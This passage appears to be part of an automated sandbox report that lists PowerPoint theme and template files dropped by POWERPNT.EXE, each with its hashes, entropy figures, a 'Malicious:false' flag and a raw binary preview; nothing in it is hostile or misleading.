                                                                                                                              Preview:PK.........Z&A........a.......[Content_Types].xml...r.`...[a.:%..R.v..p.gh..$d...^../.[0.e..=d....B...c.._?~._>$..}...2.t]...D.ty...I........._....T.M.I..,..APLo.$,z.,J.wf.<...e>..p.=.G......eZFiyT...8....E...P}y}..,.w;...\]k.....o......9(.E<.....>..I;....|.Lq.g....]..g......~>W.<....0/?.I.....g...U.V..3....l.O........m.l...T.....h.GE.......'K....$...z.E..(.Gc.....N......>...b....Z...Y.f.13k..:af..Y..13...........8L....o...s.....k...l.k....K.Z..i[..7mk...m._........~.../.^...{..Z...r@........P.@.....Z..d....R..e.O..jY.S.,..Z..T-K}....Z-^}.}iyS_C.C}.6.w.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_.....}iyS_C.C}C...*....Y.R..uwY.S.,..Z..T-K}...>U.R..e.O..W..o./-o.kha....N.LP..e.O...,..Z..T-K}...>U.R..e.O..jY....w./-o.kha.odC}#...s"kY....K}...>U.R..e.O..jY.S.,..Z..j.x.....M}.-....P....9..,..\[w..>U.R..e.O..jY.S.,..Z..T-K}.Z..N...M}.-...m.o.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_............3..;S0A='...>.k...jY.S.,..Z..T-K}...>U.R..e..V.W.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286
                                                                                                                              Entropy (8bit):3.51951639572024
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXeZkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnykmymD0wbnKNAH/lMz1
                                                                                                                              MD5:77DEBFBA0B5B6B234F571A6A97E744F3
                                                                                                                              SHA1:51DD22B67F86F9F21E791D7B08810C297DE4756B
                                                                                                                              SHA-256:DDEA979C345BDB9F5D33D673CD74C84B2C25A16DE1CAC1D2311FBB52E011C786
                                                                                                                              SHA-512:428E2C1D370D783B481EA64E3700942F9F74E4B1693793078C8F51E8644A5A8B39DEEFF79A84E3A2C1EBF6A6A5694C26F86D19542FD3DC334A81FA94386E19A0
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.e.t.r.o.s.p.e.c.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1463634
                                                                                                                              Entropy (8bit):7.898382456989258
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.5286004619027067
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                              MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                              SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                              SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                              SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1593982
                                                                                                                              Entropy (8bit):7.907400454215888
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:zT2WTsZasyuJiyV0mDUoHLgwPjvgpEtrYpXjdHo8dJNgR6MxNTkdXylo:/KYlO3BpPTgpEtkpXJTgHxWuo
                                                                                                                              MD5:407ACAACDD935B4C82A2D4AF73D07744
                                                                                                                              SHA1:E7AB195DF6F9BFD7676C34503E337194DC7631DD
                                                                                                                              SHA-256:ED85105C65F81EC015215B76ECBD46BEE4CAAA17AD716393DFD15D5DCD57A3E4
                                                                                                                              SHA-512:03D30E2357319A8153D242EEE035DDFDA718CE93E00C0D99ECF82C1387D1FE1A436111E13AD1CE67214C87CF4709D68FF452C041772A43CB242786ED4090370A
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):292
                                                                                                                              Entropy (8bit):3.549050193282821
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXiXAKSwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyX3qymD0wbnKNAH/lMz1
                                                                                                                              MD5:D7052608155B2599CDB50B8F9AAD7BD2
                                                                                                                              SHA1:F7213641CDC854DD1E7812BCCF9BD918188149F1
                                                                                                                              SHA-256:577A765CD1FBE2B62887AD32EE0CF7DCD6FCF166772AFB5895F5E11C0C1386AB
                                                                                                                              SHA-512:173AA81483025EE6A2FA042C8B281226D27E0AB4CF7E61A09FDA3897445CE90D300C9E2173AE10BC051F60CD3576B343F963FB482DC7C6529488AE8E82A5A107
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.o.n._.B.o.a.r.d.r.o.o.m...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1750795
                                                                                                                              Entropy (8bit):7.892395931401988
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                              MD5:529795E0B55926752462CBF32C14E738
                                                                                                                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.528155916440219
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                              MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                              SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                              SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                              SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):304
                                                                                                                              Entropy (8bit):3.599289509037855
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXwSil6RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyAflgymD0wbnKNAH/lMz1
                                                                                                                              MD5:2D8509303418A7C7E5C2590D70FA6BBC
                                                                                                                              SHA1:BB75B99280F7955E7E45133EEC2D61D6D04C3722
                                                                                                                              SHA-256:F6D3A404DC524E41E261C12BFB002762E2F3275E3F4FFF6533C481F15873C0F8
                                                                                                                              SHA-512:9FF24BBB10CFD783E579518F1FA5B6FE340E0544CC2EC613D378B6A2FD95DEE5CBE964CD74ED5ADB9E093958E12B7B755D6E8E114CC2BB34A17F3B5214E966C6
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.y.T.e.m.p.l.a.t.e._.0.2.8.3.6.3.4.2...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1824766
                                                                                                                              Entropy (8bit):7.941741037170679
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:jS2WTsZasyuJiyV0mDUoHLgwPjvv96H8D86IRZ2s4p/H2rDCg+tuXlYMErpGzwZN:OKYlO3BpPTvc8oFZ29/Rg+rrDLr
                                                                                                                              MD5:C5A07069AD7E82F3AEB099F346C4FF62
                                                                                                                              SHA1:39A58834FD8A25AED63FB83F0C00712AFC3BD2F5
                                                                                                                              SHA-256:EB7806D9DC3D2ABF82A061709BCD9DB8DD98FA060E66DAF6820D1FA81BB5B845
                                                                                                                              SHA-512:343FB8BFFA01801EED7289A513564B55B0045FF3D0A842A819CECE416C53C2398D0A0D9B55397BF2EAD5393638085AB6AB83ECB2C701F532BD55C0FED4C98EEC
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........l.%A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2357051
                                                                                                                              Entropy (8bit):7.929430745829162
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.516423078177173
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                              MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                              SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                              SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                              SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2332136
                                                                                                                              Entropy (8bit):7.9547975506532795
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:5HQKNdoI77mfXP/mDZLGkkgrODG1MHKr4nNtOmtu0:5HNjoygXnm0jgrODhqrsNcmtu0
                                                                                                                              MD5:2AECC99B664F840799028A20703C3E21
                                                                                                                              SHA1:0018EAB0CE4900220607F4F80B506AA2F7F89C17
                                                                                                                              SHA-256:DF93F14304E35E460EEC7F8464AE2C2B0BFFA84D860D4857F41E0F07A3F023E3
                                                                                                                              SHA-512:E0BD3A86C7AF6B7202E8FBA42BCA27FBB17A21AC94A685A38C8A45F5AE35F350AE18D6B107F553DC95774FAE47F8BD8926F76DDD840BB7EB8E51E5CF2269AA1C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........fdlB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.5344681868414707
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX4+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyocymD0wbnKNAH/lMz1
                                                                                                                              MD5:C601540411B7C0E6DE93621C69A0B71D
                                                                                                                              SHA1:B1F855540B73B163B6FD15B227C0B1D0EDC51AA9
                                                                                                                              SHA-256:6690E31622155199015B15E94B39C52BEBD081611F4AE0A9E3299CC56AF8EE33
                                                                                                                              SHA-512:90B14C2D325A091CA3A8CAAE2B4888F79BE0CD9C7E73E3B27A73F5043BB26491ABEEBEC9E25BB27F0E11B7E8F3E5E706F7D0623759301C4FAF0BCA7BCA8F66E2
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.e.p.t.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2218943
                                                                                                                              Entropy (8bit):7.942378408801199
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                              MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):278
                                                                                                                              Entropy (8bit):3.544065206514744
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                              MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                              SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                              SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                              SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2443359
                                                                                                                              Entropy (8bit):7.927032974390551
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:2HZkYR3gdOwBkskdDT+FQDGn5zpoLU0izCPOYZSKgdE6qFnm3DP+ulUnW:2jRkOlskJpDO5zpoKzZBKga6YmzWulUW
                                                                                                                              MD5:960696AF7BBDF3A98F282FD51A641797
                                                                                                                              SHA1:D884A5875C64C8F3B011E0754BEA633ACACEFBE6
                                                                                                                              SHA-256:CBFAC1EE697AB73485822088E25CEDB92D495B0B9423464CEBAC2FE3989212FC
                                                                                                                              SHA-512:9000DD85A0B2EBF5BE41D6C9785D69462D4D1B097D49CF2A57A432AB5D784BB9C95ECF1EB9F7CCC88D0CE47C580014E038D7A716FD1F8C094D2E6A1A42F3F0A3
                                                                                                                              Malicious:false
